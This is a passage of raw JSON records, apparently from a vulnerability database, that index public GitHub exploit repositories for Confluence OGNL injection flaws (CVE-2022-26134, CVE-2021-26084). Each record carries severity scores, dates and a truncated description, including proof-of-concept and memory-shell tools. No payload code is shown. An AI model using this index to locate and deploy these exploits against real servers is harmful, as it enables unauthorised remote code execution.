CVE-20...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-04T10:44:38", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Data Center", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", 
"authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2022-06-09T12:17:21", "id": "423DF4D5-60AF-5663-B196-2A67DD13D226", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-06-14T19:59:38", "description": "# Confluence RCE [CVE-2022-26134] Exploit Detection\n\n## Pre-requ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-03T13:52:14", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Data Center", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2022-06-07T09:11:48", "id": "D22CFFB0-30A6-5227-8048-C9C028070BD3", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-23T16:54:55", "description": "# CVE-2022-26134\nConfluence OGNL expression injected RCE(CVE-202...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": 
"UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-04T11:16:28", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Data Center", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2022-07-23T11:23:06", "id": "EA88FA45-8CE7-5D7D-8E6C-B04F8392F7EB", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-08-05T07:59:49", "description": "# CVE-2022-26134\r\n\u8fdc\u7a0b\u653b\u51fb\u8005\u5728\u672a\u7ecf\u8eab\u4efd\u9a8c\u8bc1\u7684\u60c5\u51b5\u4e0b\uff0c\u53ef\u6784\u9020OGNL\u8868\u8fbe\u5f0f\u8fdb\u884c\u6ce8\u5165\uff0c\u5b9e\u73b0\u5728Confluence ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-07-23T14:38:11", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Data Center", "bulletinFamily": 
"exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2022-08-05T06:45:59", "id": "F0CF90CD-DC6E-5F0F-AD61-5E1694700F32", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-06-30T05:01:42", "description": "# CVE-2022-26134\nAtlassian Conflue...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-07T06:57:02", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Data Center", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2022-06-07T14:41:51", "id": 
"18A205C9-C2EE-55CC-9BFD-4054390F94E9", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-06-14T19:58:56", "description": "# CVE-2022-26134 POC\n\n## Description\n```\nIn affected versions of...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-07T10:36:11", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Data Center", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2022-06-08T05:09:06", "id": "54DD3775-9F3C-54DF-93EF-372304E8EE4B", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-06-22T09:05:58", "description": "### CVE-2022-26134 - OGNL injection vulnerability.\n\nIn affected ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": 
"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-21T11:49:48", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Data Center", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2022-06-22T06:59:37", "id": "1F9C946C-1533-5835-B5E8-641EF4FFC145", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-06-14T19:57:19", "description": "### CVE-2022-26134 - OGNL injection vulnerability.\r\n\r\nScript pro...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-12T21:26:17", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Data Center", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, 
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2022-06-12T22:09:30", "id": "4D37AF88-23E8-5A3B-B559-7807CB07DB09", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-06-14T20:01:10", "description": "# Confluence-CVE-2022-26134\n...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-05T13:51:39", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Data Center", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2022-06-06T01:29:57", "id": "AB8EAC0D-269A-5799-885F-B0EA2A33792C", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-05T04:58:35", "description": "# [-] CVE-2022-26134 - Confluence Pre-Auth Remote Code Execution...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": 
"HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-13T23:01:39", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Data Center", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2022-07-05T01:06:00", "id": "FD4859A0-D69F-503C-BFDB-0C9025BDC68F", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-06-14T19:59:56", "description": "# CVE-2022-26134-POC\nCVE-20...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-03T18:32:35", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Data Center", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": 
false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2022-06-07T09:11:59", "id": "F8CD1EFD-78D9-5506-9555-5A12EFB752AB", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-06-26T15:36:52", "description": "# ConfluentPwn\nConfluence pre-auth ONGL injection remote code ex...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-08T04:53:31", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Data Center", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2022-06-26T13:24:44", "id": "83B145E2-F995-5B1C-863E-164839ED1173", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": 
"2022-06-22T22:57:56", "description": "# CVE-2022-26134\n \n -u URL, --url URL \u76ee\u6807url\n \n -c COMM...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-09T02:11:58", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Data Center", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2022-06-22T17:49:52", "id": "12691014-3333-5741-80A4-3357BD72D2AC", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-06-14T19:59:38", "description": "\u6279\u91cf\u9a8c\u8bc1 CVE-2...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-04T05:46:48", "type": "githubexploit", "title": "Exploit for 
Injection in Atlassian Confluence Data Center", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2022-06-05T09:29:34", "id": "2444574D-533F-593F-8E0E-68EA2B47EF55", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-13T08:06:13", "description": "pip3 install -r require...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-07-08T12:24:21", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Data Center", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": 
"2022-07-13T05:27:44", "id": "35830627-EBEC-59C8-A142-2F06CCF8EA5B", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-06-14T19:58:07", "description": "# exploit_CVE-2022-26134\nCVE-2022-26134, an OGNL injection vulne...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-10T08:57:30", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Data Center", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2022-06-10T09:07:45", "id": "02241D2D-F86F-5FE5-95FD-6978A07FE7FA", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-08-11T03:10:59", "description": "### CVE-2022-26134 - OGNL injection vulnerability.\r\n\r\nScript pro...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, 
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-03T21:07:30", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Data Center", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2022-08-11T02:20:47", "id": "8F6AEAF4-2161-55F7-96CB-003251BDC309", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-08-08T05:05:12", "description": "# CVE-2022-26134-Godzilla-MEMSHELL\n\n## Usage\n```\njava -jar CVE-2...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-07T09:19:02", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Data Center", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", 
"baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2022-08-08T01:54:36", "id": "65AEB692-CDF9-53FB-B13F-CAB5A4288606", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-08-09T03:11:18", "description": "# CVE-2021-26084 - Confluence Pre-Auth RCE OGNL injection\n### U...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-01T07:45:55", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2022-08-08T09:54:38", "id": "47577DF3-ABF2-57F3-A35B-0496F4EE7DD9", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-06-10T18:09:02", "description": "* CVE-2021-26084\n--------\n** Description\n - POC of CVE-2021-2...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": 
